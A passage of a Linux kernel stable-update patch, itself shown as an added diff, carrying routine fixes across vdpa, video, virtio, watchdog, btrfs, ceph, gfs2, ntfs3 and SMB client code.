+ 		.flags = GENL_ADMIN_PERM,
+ 	},
+ 	{
+ 		.cmd = VDPA_CMD_DEV_DEL,
+-		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+ 		.doit = vdpa_nl_cmd_dev_del_set_doit,
+ 		.flags = GENL_ADMIN_PERM,
+ 	},
+ 	{
+ 		.cmd = VDPA_CMD_DEV_GET,
+-		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+ 		.doit = vdpa_nl_cmd_dev_get_doit,
+ 		.dumpit = vdpa_nl_cmd_dev_get_dumpit,
+ 	},
+ 	{
+ 		.cmd = VDPA_CMD_DEV_CONFIG_GET,
+-		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+ 		.doit = vdpa_nl_cmd_dev_config_get_doit,
+ 		.dumpit = vdpa_nl_cmd_dev_config_get_dumpit,
+ 	},
+ 	{
+ 		.cmd = VDPA_CMD_DEV_VSTATS_GET,
+-		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+ 		.doit = vdpa_nl_cmd_dev_stats_get_doit,
+ 		.flags = GENL_ADMIN_PERM,
+ 	},
+diff --git a/drivers/vdpa/vdpa_user/vduse_dev.c b/drivers/vdpa/vdpa_user/vduse_dev.c
+index 72f924ec4658d..edcd74cc4c0f7 100644
+--- a/drivers/vdpa/vdpa_user/vduse_dev.c
++++ b/drivers/vdpa/vdpa_user/vduse_dev.c
+@@ -899,10 +899,10 @@ static void vduse_dev_irq_inject(struct work_struct *work)
+ {
+ 	struct vduse_dev *dev = container_of(work, struct vduse_dev, inject);
+ 
+-	spin_lock_irq(&dev->irq_lock);
++	spin_lock_bh(&dev->irq_lock);
+ 	if (dev->config_cb.callback)
+ 		dev->config_cb.callback(dev->config_cb.private);
+-	spin_unlock_irq(&dev->irq_lock);
++	spin_unlock_bh(&dev->irq_lock);
+ }
+ 
+ static void vduse_vq_irq_inject(struct work_struct *work)
+@@ -910,10 +910,10 @@ static void vduse_vq_irq_inject(struct work_struct *work)
+ 	struct vduse_virtqueue *vq = container_of(work,
+ 					struct vduse_virtqueue, inject);
+ 
+-	spin_lock_irq(&vq->irq_lock);
++	spin_lock_bh(&vq->irq_lock);
+ 	if (vq->ready && vq->cb.callback)
+ 		vq->cb.callback(vq->cb.private);
+-	spin_unlock_irq(&vq->irq_lock);
++	spin_unlock_bh(&vq->irq_lock);
+ }
+ 
+ static int vduse_dev_queue_irq_work(struct vduse_dev *dev,
+diff --git a/drivers/video/aperture.c b/drivers/video/aperture.c
+index 41e77de1ea82c..5c94abdb1ad6d 100644
+--- a/drivers/video/aperture.c
++++ b/drivers/video/aperture.c
+@@ -332,15 +332,16 @@ int aperture_remove_conflicting_pci_devices(struct pci_dev *pdev, const char *na
+ 	primary = pdev->resource[PCI_ROM_RESOURCE].flags & IORESOURCE_ROM_SHADOW;
+ #endif
+ 
++	if (primary)
++		sysfb_disable();
++
+ 	for (bar = 0; bar < PCI_STD_NUM_BARS; ++bar) {
+ 		if (!(pci_resource_flags(pdev, bar) & IORESOURCE_MEM))
+ 			continue;
+ 
+ 		base = pci_resource_start(pdev, bar);
+ 		size = pci_resource_len(pdev, bar);
+-		ret = aperture_remove_conflicting_devices(base, size, primary, name);
+-		if (ret)
+-			return ret;
++		aperture_detach_devices(base, size);
+ 	}
+ 
+ 	/*
+diff --git a/drivers/video/fbdev/hyperv_fb.c b/drivers/video/fbdev/hyperv_fb.c
+index 4ff25dfc865d9..d3d643cf7506c 100644
+--- a/drivers/video/fbdev/hyperv_fb.c
++++ b/drivers/video/fbdev/hyperv_fb.c
+@@ -995,13 +995,10 @@ static int hvfb_getmem(struct hv_device *hdev, struct fb_info *info)
+ 	struct pci_dev *pdev  = NULL;
+ 	void __iomem *fb_virt;
+ 	int gen2vm = efi_enabled(EFI_BOOT);
++	resource_size_t base, size;
+ 	phys_addr_t paddr;
+ 	int ret;
+ 
+-	info->apertures = alloc_apertures(1);
+-	if (!info->apertures)
+-		return -ENOMEM;
+-
+ 	if (!gen2vm) {
+ 		pdev = pci_get_device(PCI_VENDOR_ID_MICROSOFT,
+ 			PCI_DEVICE_ID_HYPERV_VIDEO, NULL);
+@@ -1010,8 +1007,8 @@ static int hvfb_getmem(struct hv_device *hdev, struct fb_info *info)
+ 			return -ENODEV;
+ 		}
+ 
+-		info->apertures->ranges[0].base = pci_resource_start(pdev, 0);
+-		info->apertures->ranges[0].size = pci_resource_len(pdev, 0);
++		base = pci_resource_start(pdev, 0);
++		size = pci_resource_len(pdev, 0);
+ 
+ 		/*
+ 		 * For Gen 1 VM, we can directly use the contiguous memory
+@@ -1034,8 +1031,8 @@ static int hvfb_getmem(struct hv_device *hdev, struct fb_info *info)
+ 		}
+ 		pr_info("Unable to allocate enough contiguous physical memory on Gen 1 VM. Using MMIO instead.\n");
+ 	} else {
+-		info->apertures->ranges[0].base = screen_info.lfb_base;
+-		info->apertures->ranges[0].size = screen_info.lfb_size;
++		base = screen_info.lfb_base;
++		size = screen_info.lfb_size;
+ 	}
+ 
+ 	/*
+@@ -1077,9 +1074,7 @@ static int hvfb_getmem(struct hv_device *hdev, struct fb_info *info)
+ 	info->screen_size = dio_fb_size;
+ 
+ getmem_done:
+-	aperture_remove_conflicting_devices(info->apertures->ranges[0].base,
+-					    info->apertures->ranges[0].size,
+-					    false, KBUILD_MODNAME);
++	aperture_remove_conflicting_devices(base, size, false, KBUILD_MODNAME);
+ 
+ 	if (gen2vm) {
+ 		/* framebuffer is reallocated, clear screen_info to avoid misuse from kexec */
+diff --git a/drivers/video/fbdev/mmp/hw/mmp_ctrl.c b/drivers/video/fbdev/mmp/hw/mmp_ctrl.c
+index 51fbf02a03430..76b50b6c98ad9 100644
+--- a/drivers/video/fbdev/mmp/hw/mmp_ctrl.c
++++ b/drivers/video/fbdev/mmp/hw/mmp_ctrl.c
+@@ -519,7 +519,9 @@ static int mmphw_probe(struct platform_device *pdev)
+ 			      "unable to get clk %s\n", mi->clk_name);
+ 		goto failed;
+ 	}
+-	clk_prepare_enable(ctrl->clk);
++	ret = clk_prepare_enable(ctrl->clk);
++	if (ret)
++		goto failed;
+ 
+ 	/* init global regs */
+ 	ctrl_set_default(ctrl);
+diff --git a/drivers/virtio/virtio_mmio.c b/drivers/virtio/virtio_mmio.c
+index 3ff746e3f24aa..dec3cba884586 100644
+--- a/drivers/virtio/virtio_mmio.c
++++ b/drivers/virtio/virtio_mmio.c
+@@ -590,9 +590,8 @@ static void virtio_mmio_release_dev(struct device *_d)
+ 	struct virtio_device *vdev =
+ 			container_of(_d, struct virtio_device, dev);
+ 	struct virtio_mmio_device *vm_dev = to_virtio_mmio_device(vdev);
+-	struct platform_device *pdev = vm_dev->pdev;
+ 
+-	devm_kfree(&pdev->dev, vm_dev);
++	kfree(vm_dev);
+ }
+ 
+ /* Platform device */
+@@ -603,7 +602,7 @@ static int virtio_mmio_probe(struct platform_device *pdev)
+ 	unsigned long magic;
+ 	int rc;
+ 
+-	vm_dev = devm_kzalloc(&pdev->dev, sizeof(*vm_dev), GFP_KERNEL);
++	vm_dev = kzalloc(sizeof(*vm_dev), GFP_KERNEL);
+ 	if (!vm_dev)
+ 		return -ENOMEM;
+ 
+diff --git a/drivers/watchdog/sp5100_tco.c b/drivers/watchdog/sp5100_tco.c
+index 14f8d8d90920f..2bd3dc25cb030 100644
+--- a/drivers/watchdog/sp5100_tco.c
++++ b/drivers/watchdog/sp5100_tco.c
+@@ -96,7 +96,7 @@ static enum tco_reg_layout tco_reg_layout(struct pci_dev *dev)
+ 	    sp5100_tco_pci->device == PCI_DEVICE_ID_AMD_KERNCZ_SMBUS &&
+ 	    sp5100_tco_pci->revision >= AMD_ZEN_SMBUS_PCI_REV) {
+ 		return efch_mmio;
+-	} else if (dev->vendor == PCI_VENDOR_ID_AMD &&
++	} else if ((dev->vendor == PCI_VENDOR_ID_AMD || dev->vendor == PCI_VENDOR_ID_HYGON) &&
+ 	    ((dev->device == PCI_DEVICE_ID_AMD_HUDSON2_SMBUS &&
+ 	     dev->revision >= 0x41) ||
+ 	    (dev->device == PCI_DEVICE_ID_AMD_KERNCZ_SMBUS &&
+@@ -579,6 +579,8 @@ static const struct pci_device_id sp5100_tco_pci_tbl[] = {
+ 	  PCI_ANY_ID, },
+ 	{ PCI_VENDOR_ID_AMD, PCI_DEVICE_ID_AMD_KERNCZ_SMBUS, PCI_ANY_ID,
+ 	  PCI_ANY_ID, },
++	{ PCI_VENDOR_ID_HYGON, PCI_DEVICE_ID_AMD_KERNCZ_SMBUS, PCI_ANY_ID,
++	  PCI_ANY_ID, },
+ 	{ 0, },			/* End of list */
+ };
+ MODULE_DEVICE_TABLE(pci, sp5100_tco_pci_tbl);
+diff --git a/fs/btrfs/block-group.c b/fs/btrfs/block-group.c
+index 3495bc775afa3..08017b180a10d 100644
+--- a/fs/btrfs/block-group.c
++++ b/fs/btrfs/block-group.c
+@@ -1533,6 +1533,10 @@ void btrfs_mark_bg_unused(struct btrfs_block_group *bg)
+ 		btrfs_get_block_group(bg);
+ 		trace_btrfs_add_unused_block_group(bg);
+ 		list_add_tail(&bg->bg_list, &fs_info->unused_bgs);
++	} else if (!test_bit(BLOCK_GROUP_FLAG_NEW, &bg->runtime_flags)) {
++		/* Pull out the block group from the reclaim_bgs list. */
++		trace_btrfs_add_unused_block_group(bg);
++		list_move_tail(&bg->bg_list, &fs_info->unused_bgs);
+ 	}
+ 	spin_unlock(&fs_info->unused_bgs_lock);
+ }
+@@ -2493,6 +2497,7 @@ void btrfs_create_pending_block_groups(struct btrfs_trans_handle *trans)
+ next:
+ 		btrfs_delayed_refs_rsv_release(fs_info, 1);
+ 		list_del_init(&block_group->bg_list);
++		clear_bit(BLOCK_GROUP_FLAG_NEW, &block_group->runtime_flags);
+ 	}
+ 	btrfs_trans_release_chunk_metadata(trans);
+ }
+@@ -2532,6 +2537,13 @@ struct btrfs_block_group *btrfs_make_block_group(struct btrfs_trans_handle *tran
+ 	if (!cache)
+ 		return ERR_PTR(-ENOMEM);
+ 
++	/*
++	 * Mark it as new before adding it to the rbtree of block groups or any
++	 * list, so that no other task finds it and calls btrfs_mark_bg_unused()
++	 * before the new flag is set.
++	 */
++	set_bit(BLOCK_GROUP_FLAG_NEW, &cache->runtime_flags);
++
+ 	cache->length = size;
+ 	set_free_space_tree_thresholds(cache);
+ 	cache->used = bytes_used;
+@@ -2540,7 +2552,7 @@ struct btrfs_block_group *btrfs_make_block_group(struct btrfs_trans_handle *tran
+ 	cache->global_root_id = calculate_global_root_id(fs_info, cache->start);
+ 
+ 	if (btrfs_fs_compat_ro(fs_info, FREE_SPACE_TREE))
+-		cache->needs_free_space = 1;
++		set_bit(BLOCK_GROUP_FLAG_NEEDS_FREE_SPACE, &cache->runtime_flags);
+ 
+ 	ret = btrfs_load_block_group_zone_info(cache, true);
+ 	if (ret) {
+diff --git a/fs/btrfs/block-group.h b/fs/btrfs/block-group.h
+index debd42aeae0f1..47a2dcbfee255 100644
+--- a/fs/btrfs/block-group.h
++++ b/fs/btrfs/block-group.h
+@@ -55,6 +55,15 @@ enum btrfs_block_group_flags {
+ 	BLOCK_GROUP_FLAG_CHUNK_ITEM_INSERTED,
+ 	BLOCK_GROUP_FLAG_ZONE_IS_ACTIVE,
+ 	BLOCK_GROUP_FLAG_ZONED_DATA_RELOC,
++	/* Does the block group need to be added to the free space tree? */
++	BLOCK_GROUP_FLAG_NEEDS_FREE_SPACE,
++	/* Indicate that the block group is placed on a sequential zone */
++	BLOCK_GROUP_FLAG_SEQUENTIAL_ZONE,
++	/*
++	 * Indicate that block group is in the list of new block groups of a
++	 * transaction.
++	 */
++	BLOCK_GROUP_FLAG_NEW,
+ };
+ 
+ enum btrfs_caching_type {
+@@ -204,15 +213,6 @@ struct btrfs_block_group {
+ 	/* Lock for free space tree operations. */
+ 	struct mutex free_space_lock;
+ 
+-	/*
+-	 * Does the block group need to be added to the free space tree?
+-	 * Protected by free_space_lock.
+-	 */
+-	int needs_free_space;
+-
+-	/* Flag indicating this block group is placed on a sequential zone */
+-	bool seq_zone;
+-
+ 	/*
+ 	 * Number of extents in this block group used for swap files.
+ 	 * All accesses protected by the spinlock 'lock'.
+diff --git a/fs/btrfs/extent_map.c b/fs/btrfs/extent_map.c
+index 4abbe4b352533..56d7580fdc3c4 100644
+--- a/fs/btrfs/extent_map.c
++++ b/fs/btrfs/extent_map.c
+@@ -784,8 +784,6 @@ void btrfs_drop_extent_map_range(struct btrfs_inode *inode, u64 start, u64 end,
+ 
+ 		if (skip_pinned && test_bit(EXTENT_FLAG_PINNED, &em->flags)) {
+ 			start = em_end;
+-			if (end != (u64)-1)
+-				len = start + len - em_end;
+ 			goto next;
+ 		}
+ 
+@@ -853,8 +851,8 @@ void btrfs_drop_extent_map_range(struct btrfs_inode *inode, u64 start, u64 end,
+ 				if (!split)
+ 					goto remove_em;
+ 			}
+-			split->start = start + len;
+-			split->len = em_end - (start + len);
++			split->start = end;
++			split->len = em_end - end;
+ 			split->block_start = em->block_start;
+ 			split->flags = flags;
+ 			split->compress_type = em->compress_type;
+diff --git a/fs/btrfs/free-space-tree.c b/fs/btrfs/free-space-tree.c
+index a207db9322264..6a44733a95e1c 100644
+--- a/fs/btrfs/free-space-tree.c
++++ b/fs/btrfs/free-space-tree.c
+@@ -803,7 +803,7 @@ int __remove_from_free_space_tree(struct btrfs_trans_handle *trans,
+ 	u32 flags;
+ 	int ret;
+ 
+-	if (block_group->needs_free_space) {
++	if (test_bit(BLOCK_GROUP_FLAG_NEEDS_FREE_SPACE, &block_group->runtime_flags)) {
+ 		ret = __add_block_group_free_space(trans, block_group, path);
+ 		if (ret)
+ 			return ret;
+@@ -996,7 +996,7 @@ int __add_to_free_space_tree(struct btrfs_trans_handle *trans,
+ 	u32 flags;
+ 	int ret;
+ 
+-	if (block_group->needs_free_space) {
++	if (test_bit(BLOCK_GROUP_FLAG_NEEDS_FREE_SPACE, &block_group->runtime_flags)) {
+ 		ret = __add_block_group_free_space(trans, block_group, path);
+ 		if (ret)
+ 			return ret;
+@@ -1350,7 +1350,7 @@ static int __add_block_group_free_space(struct btrfs_trans_handle *trans,
+ {
+ 	int ret;
+ 
+-	block_group->needs_free_space = 0;
++	clear_bit(BLOCK_GROUP_FLAG_NEEDS_FREE_SPACE, &block_group->runtime_flags);
+ 
+ 	ret = add_new_free_space_info(trans, block_group, path);
+ 	if (ret)
+@@ -1372,7 +1372,7 @@ int add_block_group_free_space(struct btrfs_trans_handle *trans,
+ 		return 0;
+ 
+ 	mutex_lock(&block_group->free_space_lock);
+-	if (!block_group->needs_free_space)
++	if (!test_bit(BLOCK_GROUP_FLAG_NEEDS_FREE_SPACE, &block_group->runtime_flags))
+ 		goto out;
+ 
+ 	path = btrfs_alloc_path();
+@@ -1405,7 +1405,7 @@ int remove_block_group_free_space(struct btrfs_trans_handle *trans,
+ 	if (!btrfs_fs_compat_ro(trans->fs_info, FREE_SPACE_TREE))
+ 		return 0;
+ 
+-	if (block_group->needs_free_space) {
++	if (test_bit(BLOCK_GROUP_FLAG_NEEDS_FREE_SPACE, &block_group->runtime_flags)) {
+ 		/* We never added this block group to the free space tree. */
+ 		return 0;
+ 	}
+diff --git a/fs/btrfs/tests/free-space-tree-tests.c b/fs/btrfs/tests/free-space-tree-tests.c
+index 13734ed43bfcb..766117a76d742 100644
+--- a/fs/btrfs/tests/free-space-tree-tests.c
++++ b/fs/btrfs/tests/free-space-tree-tests.c
+@@ -470,7 +470,7 @@ static int run_test(test_func_t test_func, int bitmaps, u32 sectorsize,
+ 	}
+ 	cache->bitmap_low_thresh = 0;
+ 	cache->bitmap_high_thresh = (u32)-1;
+-	cache->needs_free_space = 1;
++	set_bit(BLOCK_GROUP_FLAG_NEEDS_FREE_SPACE, &cache->runtime_flags);
+ 	cache->fs_info = root->fs_info;
+ 
+ 	btrfs_init_dummy_trans(&trans, root->fs_info);
+diff --git a/fs/btrfs/volumes.c b/fs/btrfs/volumes.c
+index 2e0832d70406c..567c5c010f931 100644
+--- a/fs/btrfs/volumes.c
++++ b/fs/btrfs/volumes.c
+@@ -4652,8 +4652,7 @@ int btrfs_cancel_balance(struct btrfs_fs_info *fs_info)
+ 		}
+ 	}
+ 
+-	BUG_ON(fs_info->balance_ctl ||
+-		test_bit(BTRFS_FS_BALANCE_RUNNING, &fs_info->flags));
++	ASSERT(!test_bit(BTRFS_FS_BALANCE_RUNNING, &fs_info->flags));
+ 	atomic_dec(&fs_info->balance_cancel_req);
+ 	mutex_unlock(&fs_info->balance_mutex);
+ 	return 0;
+diff --git a/fs/btrfs/zoned.c b/fs/btrfs/zoned.c
+index 836babd23db52..9bc7ac06c5177 100644
+--- a/fs/btrfs/zoned.c
++++ b/fs/btrfs/zoned.c
+@@ -1436,7 +1436,7 @@ int btrfs_load_block_group_zone_info(struct btrfs_block_group *cache, bool new)
+ 	}
+ 
+ 	if (num_sequential > 0)
+-		cache->seq_zone = true;
++		set_bit(BLOCK_GROUP_FLAG_SEQUENTIAL_ZONE, &cache->runtime_flags);
+ 
+ 	if (num_conventional > 0) {
+ 		/* Zone capacity is always zone size in emulation */
+@@ -1658,7 +1658,7 @@ bool btrfs_use_zone_append(struct btrfs_inode *inode, u64 start)
+ 	if (!cache)
+ 		return false;
+ 
+-	ret = cache->seq_zone;
++	ret = !!test_bit(BLOCK_GROUP_FLAG_SEQUENTIAL_ZONE, &cache->runtime_flags);
+ 	btrfs_put_block_group(cache);
+ 
+ 	return ret;
+@@ -2177,7 +2177,8 @@ static void btrfs_zone_finish_endio_workfn(struct work_struct *work)
+ void btrfs_schedule_zone_finish_bg(struct btrfs_block_group *bg,
+ 				   struct extent_buffer *eb)
+ {
+-	if (!bg->seq_zone || eb->start + eb->len * 2 <= bg->start + bg->zone_capacity)
++	if (!test_bit(BLOCK_GROUP_FLAG_SEQUENTIAL_ZONE, &bg->runtime_flags) ||
++	    eb->start + eb->len * 2 <= bg->start + bg->zone_capacity)
+ 		return;
+ 
+ 	if (WARN_ON(bg->zone_finish_work.func == btrfs_zone_finish_endio_workfn)) {
+diff --git a/fs/ceph/mds_client.c b/fs/ceph/mds_client.c
+index dcabe2783edfe..5399a9ea5b4f1 100644
+--- a/fs/ceph/mds_client.c
++++ b/fs/ceph/mds_client.c
+@@ -645,6 +645,7 @@ bad:
+ 	err = -EIO;
+ out_bad:
+ 	pr_err("mds parse_reply err %d\n", err);
++	ceph_msg_dump(msg);
+ 	return err;
+ }
+ 
+@@ -3534,6 +3535,7 @@ static void handle_forward(struct ceph_mds_client *mdsc,
+ 
+ bad:
+ 	pr_err("mdsc_handle_forward decode error err=%d\n", err);
++	ceph_msg_dump(msg);
+ }
+ 
+ static int __decode_session_metadata(void **p, void *end,
+@@ -5254,6 +5256,7 @@ void ceph_mdsc_handle_fsmap(struct ceph_mds_client *mdsc, struct ceph_msg *msg)
+ bad:
+ 	pr_err("error decoding fsmap %d. Shutting down mount.\n", err);
+ 	ceph_umount_begin(mdsc->fsc->sb);
++	ceph_msg_dump(msg);
+ err_out:
+ 	mutex_lock(&mdsc->mutex);
+ 	mdsc->mdsmap_err = err;
+@@ -5322,6 +5325,7 @@ bad_unlock:
+ bad:
+ 	pr_err("error decoding mdsmap %d. Shutting down mount.\n", err);
+ 	ceph_umount_begin(mdsc->fsc->sb);
++	ceph_msg_dump(msg);
+ 	return;
+ }
+ 
+diff --git a/fs/gfs2/super.c b/fs/gfs2/super.c
+index 9d27aa8bd2bc6..44c564f0bc622 100644
+--- a/fs/gfs2/super.c
++++ b/fs/gfs2/super.c
+@@ -981,7 +981,14 @@ static int gfs2_show_options(struct seq_file *s, struct dentry *root)
+ {
+ 	struct gfs2_sbd *sdp = root->d_sb->s_fs_info;
+ 	struct gfs2_args *args = &sdp->sd_args;
+-	int val;
++	unsigned int logd_secs, statfs_slow, statfs_quantum, quota_quantum;
++
++	spin_lock(&sdp->sd_tune.gt_spin);
++	logd_secs = sdp->sd_tune.gt_logd_secs;
++	quota_quantum = sdp->sd_tune.gt_quota_quantum;
++	statfs_quantum = sdp->sd_tune.gt_statfs_quantum;
++	statfs_slow = sdp->sd_tune.gt_statfs_slow;
++	spin_unlock(&sdp->sd_tune.gt_spin);
+ 
+ 	if (is_ancestor(root, sdp->sd_master_dir))
+ 		seq_puts(s, ",meta");
+@@ -1036,17 +1043,14 @@ static int gfs2_show_options(struct seq_file *s, struct dentry *root)
+ 	}
+ 	if (args->ar_discard)
+ 		seq_puts(s, ",discard");
+-	val = sdp->sd_tune.gt_logd_secs;
+-	if (val != 30)
+-		seq_printf(s, ",commit=%d", val);
+-	val = sdp->sd_tune.gt_statfs_quantum;
+-	if (val != 30)
+-		seq_printf(s, ",statfs_quantum=%d", val);
+-	else if (sdp->sd_tune.gt_statfs_slow)
++	if (logd_secs != 30)
++		seq_printf(s, ",commit=%d", logd_secs);
++	if (statfs_quantum != 30)
++		seq_printf(s, ",statfs_quantum=%d", statfs_quantum);
++	else if (statfs_slow)
+ 		seq_puts(s, ",statfs_quantum=0");
+-	val = sdp->sd_tune.gt_quota_quantum;
+-	if (val != 60)
+-		seq_printf(s, ",quota_quantum=%d", val);
++	if (quota_quantum != 60)
++		seq_printf(s, ",quota_quantum=%d", quota_quantum);
+ 	if (args->ar_statfs_percent)
+ 		seq_printf(s, ",statfs_percent=%d", args->ar_statfs_percent);
+ 	if (args->ar_errors != GFS2_ERRORS_DEFAULT) {
+diff --git a/fs/ntfs3/frecord.c b/fs/ntfs3/frecord.c
+index b1b476fb7229b..dda13e1f1b330 100644
+--- a/fs/ntfs3/frecord.c
++++ b/fs/ntfs3/frecord.c
+@@ -874,6 +874,7 @@ int ni_create_attr_list(struct ntfs_inode *ni)
+ 	if (err)
+ 		goto out1;
+ 
++	err = -EINVAL;
+ 	/* Call mi_remove_attr() in reverse order to keep pointers 'arr_move' valid. */
+ 	while (to_free > 0) {
+ 		struct ATTRIB *b = arr_move[--nb];
+@@ -882,7 +883,8 @@ int ni_create_attr_list(struct ntfs_inode *ni)
+ 
+ 		attr = mi_insert_attr(mi, b->type, Add2Ptr(b, name_off),
+ 				      b->name_len, asize, name_off);
+-		WARN_ON(!attr);
++		if (!attr)
++			goto out1;
+ 
+ 		mi_get_ref(mi, &le_b[nb]->ref);
+ 		le_b[nb]->id = attr->id;
+@@ -892,17 +894,20 @@ int ni_create_attr_list(struct ntfs_inode *ni)
+ 		attr->id = le_b[nb]->id;
+ 
+ 		/* Remove from primary record. */
+-		WARN_ON(!mi_remove_attr(NULL, &ni->mi, b));
++		if (!mi_remove_attr(NULL, &ni->mi, b))
++			goto out1;
+ 
+ 		if (to_free <= asize)
+ 			break;
+ 		to_free -= asize;
+-		WARN_ON(!nb);
++		if (!nb)
++			goto out1;
+ 	}
+ 
+ 	attr = mi_insert_attr(&ni->mi, ATTR_LIST, NULL, 0,
+ 			      lsize + SIZEOF_RESIDENT, SIZEOF_RESIDENT);
+-	WARN_ON(!attr);
++	if (!attr)
++		goto out1;
+ 
+ 	attr->non_res = 0;
+ 	attr->flags = 0;
+@@ -922,9 +927,10 @@ out1:
+ 	kfree(ni->attr_list.le);
+ 	ni->attr_list.le = NULL;
+ 	ni->attr_list.size = 0;
++	return err;
+ 
+ out:
+-	return err;
++	return 0;
+ }
+ 
+ /*
+diff --git a/fs/ntfs3/fsntfs.c b/fs/ntfs3/fsntfs.c
+index b6e22bcb929ba..829b62d3bb889 100644
+--- a/fs/ntfs3/fsntfs.c
++++ b/fs/ntfs3/fsntfs.c
+@@ -154,7 +154,7 @@ int ntfs_fix_post_read(struct NTFS_RECORD_HEADER *rhdr, size_t bytes,
+ 	/* Check errors. */
+ 	if ((fo & 1) || fo + fn * sizeof(short) > SECTOR_SIZE || !fn-- ||
+ 	    fn * SECTOR_SIZE > bytes) {
+-		return -EINVAL; /* Native chkntfs returns ok! */
++		return -E_NTFS_CORRUPT;
+ 	}
+ 
+ 	/* Get fixup pointer. */
+diff --git a/fs/ntfs3/index.c b/fs/ntfs3/index.c
+index 9e9a9ffd92958..495cfb37962fa 100644
+--- a/fs/ntfs3/index.c
++++ b/fs/ntfs3/index.c
+@@ -1103,6 +1103,12 @@ ok:
+ 	*node = in;
+ 
+ out:
++	if (err == -E_NTFS_CORRUPT) {
++		ntfs_inode_err(&ni->vfs_inode, "directory corrupted");
++		ntfs_set_state(ni->mi.sbi, NTFS_DIRTY_ERROR);
++		err = -EINVAL;
++	}
++
+ 	if (ib != in->index)
+ 		kfree(ib);
+ 
+diff --git a/fs/ntfs3/ntfs_fs.h b/fs/ntfs3/ntfs_fs.h
+index 24227b2e1b2b0..8c9abaf139e67 100644
+--- a/fs/ntfs3/ntfs_fs.h
++++ b/fs/ntfs3/ntfs_fs.h
+@@ -53,6 +53,8 @@ enum utf16_endian;
+ #define E_NTFS_NONRESIDENT		556
+ /* NTFS specific error code about punch hole. */
+ #define E_NTFS_NOTALIGNED		557
++/* NTFS specific error code when on-disk struct is corrupted. */
++#define E_NTFS_CORRUPT			558
+ 
+ 
+ /* sbi->flags */
+diff --git a/fs/ntfs3/record.c b/fs/ntfs3/record.c
+index af1e4b364ea8e..ba336c7280b85 100644
+--- a/fs/ntfs3/record.c
++++ b/fs/ntfs3/record.c
+@@ -124,7 +124,7 @@ int mi_read(struct mft_inode *mi, bool is_mft)
+ 	struct rw_semaphore *rw_lock = NULL;
+ 
+ 	if (is_mounted(sbi)) {
+-		if (!is_mft) {
++		if (!is_mft && mft_ni) {
+ 			rw_lock = &mft_ni->file.run_lock;
+ 			down_read(rw_lock);
+ 		}
+@@ -148,7 +148,7 @@ int mi_read(struct mft_inode *mi, bool is_mft)
+ 		ni_lock(mft_ni);
+ 		down_write(rw_lock);
+ 	}
+-	err = attr_load_runs_vcn(mft_ni, ATTR_DATA, NULL, 0, &mft_ni->file.run,
++	err = attr_load_runs_vcn(mft_ni, ATTR_DATA, NULL, 0, run,
+ 				 vbo >> sbi->cluster_bits);
+ 	if (rw_lock) {
+ 		up_write(rw_lock);
+@@ -180,6 +180,12 @@ ok:
+ 	return 0;
+ 
+ out:
++	if (err == -E_NTFS_CORRUPT) {
++		ntfs_err(sbi->sb, "mft corrupted");
++		ntfs_set_state(sbi, NTFS_DIRTY_ERROR);
++		err = -EINVAL;
++	}
++
+ 	return err;
+ }
+ 
+diff --git a/fs/smb/client/cifsfs.c b/fs/smb/client/cifsfs.c
+index 078df1e2dd18a..18d66497c42d1 100644
+--- a/fs/smb/client/cifsfs.c
++++ b/fs/smb/client/cifsfs.c
+@@ -883,11 +883,11 @@ struct dentry *
+ cifs_smb3_do_mount(struct file_system_type *fs_type,
+ 	      int flags, struct smb3_fs_context *old_ctx)
+ {
+-	int rc;
+-	struct super_block *sb = NULL;
+-	struct cifs_sb_info *cifs_sb = NULL;
+ 	struct cifs_mnt_data mnt_data;
++	struct cifs_sb_info *cifs_sb;
++	struct super_block *sb;
+ 	struct dentry *root;
++	int rc;
+ 
+ 	/*
+ 	 * Prints in Kernel / CIFS log the attempted mount operation
+@@ -898,11 +898,9 @@ cifs_smb3_do_mount(struct file_system_type *fs_type,
+ 	else
+ 		cifs_info("Attempting to mount %s\n", old_ctx->UNC);
+ 
+-	cifs_sb = kzalloc(sizeof(struct cifs_sb_info), GFP_KERNEL);
+-	if (cifs_sb == NULL) {
+-		root = ERR_PTR(-ENOMEM);
+-		goto out;
+-	}
++	cifs_sb = kzalloc(sizeof(*cifs_sb), GFP_KERNEL);
++	if (!cifs_sb)
++		return ERR_PTR(-ENOMEM);
+ 
+ 	cifs_sb->ctx = kzalloc(sizeof(struct smb3_fs_context), GFP_KERNEL);
+ 	if (!cifs_sb->ctx) {
+@@ -945,10 +943,8 @@ cifs_smb3_do_mount(struct file_system_type *fs_type,
+ 
+ 	sb = sget(fs_type, cifs_match_super, cifs_set_super, flags, &mnt_data);
+ 	if (IS_ERR(sb)) {
+-		root = ERR_CAST(sb);
+ 		cifs_umount(cifs_sb);
+-		cifs_sb = NULL;
+-		goto out;
++		return ERR_CAST(sb);
+ 	}
+ 
+ 	if (sb->s_root) {
+@@ -979,13 +975,9 @@ out_super:
+ 	deactivate_locked_super(sb);
+ 	return root;
+ out:
+-	if (cifs_sb) {
+-		if (!sb || IS_ERR(sb)) {  /* otherwise kill_sb will handle */
+-			kfree(cifs_sb->prepath);
+-			smb3_cleanup_fs_context(cifs_sb->ctx);
+-			kfree(cifs_sb);
+-		}
+-	}
++	kfree(cifs_sb->prepath);
++	smb3_cleanup_fs_context(cifs_sb->ctx);
++	kfree(cifs_sb);
+ 	return root;
+ }
+ 
+diff --git a/fs/smb/client/file.c b/fs/smb/client/file.c
+index 27c6d14e369f1..0f3405e0f2e48 100644
+--- a/fs/smb/client/file.c
++++ b/fs/smb/client/file.c
+@@ -4885,9 +4885,9 @@ static int cifs_readpage_worker(struct file *file, struct page *page,
+ 
+ io_error:
+ 	kunmap(page);
+-	unlock_page(page);
+ 
+ read_complete:
++	unlock_page(page);
+ 	return rc;
+ }
+ 
+@@ -5082,9 +5082,11 @@ void cifs_oplock_break(struct work_struct *work)
+ 	struct cifsFileInfo *cfile = container_of(work, struct cifsFileInfo,
+ 						  oplock_break);
+ 	struct inode *inode = d_inode(cfile->dentry);
++	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
+ 	struct cifsInodeInfo *cinode = CIFS_I(inode);
+-	struct cifs_tcon *tcon = tlink_tcon(cfile->tlink);
+-	struct TCP_Server_Info *server = tcon->ses->server;
++	struct cifs_tcon *tcon;
++	struct TCP_Server_Info *server;
++	struct tcon_link *tlink;
+ 	int rc = 0;
